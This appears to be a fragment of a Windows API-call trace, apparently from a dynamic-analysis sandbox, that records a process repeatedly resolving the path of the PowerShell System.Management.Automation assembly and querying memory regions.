[0079.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.852] VirtualQuery (in: lpAddress=0x10ae50, lpBuffer=0x10bd10, dwLength=0x30 | out: lpBuffer=0x10bd10*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.852] VirtualQuery (in: lpAddress=0x10aee0, lpBuffer=0x10bda0, dwLength=0x30 | out: lpBuffer=0x10bda0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.852] VirtualQuery (in: lpAddress=0x10ae50, lpBuffer=0x10bd10, dwLength=0x30 | out: lpBuffer=0x10bd10*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.852] VirtualQuery (in: lpAddress=0x10aee0, lpBuffer=0x10bda0, dwLength=0x30 | out: lpBuffer=0x10bda0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.853] VirtualQuery (in: lpAddress=0x10ae50, lpBuffer=0x10bd10, dwLength=0x30 | out: lpBuffer=0x10bd10*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.853] VirtualQuery (in: lpAddress=0x10aee0, lpBuffer=0x10bda0, dwLength=0x30 | out: lpBuffer=0x10bda0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.854] VirtualQuery (in: lpAddress=0x10ae50, lpBuffer=0x10bd10, dwLength=0x30 | out: lpBuffer=0x10bd10*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.854] VirtualQuery (in: lpAddress=0x10aee0, lpBuffer=0x10bda0, dwLength=0x30 | out: lpBuffer=0x10bda0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.855] VirtualQuery (in: lpAddress=0x10b8f0, lpBuffer=0x10c7b0, dwLength=0x30 | out: lpBuffer=0x10c7b0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.856] VirtualQuery (in: lpAddress=0x10b8f0, lpBuffer=0x10c7b0, dwLength=0x30 | out: lpBuffer=0x10c7b0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
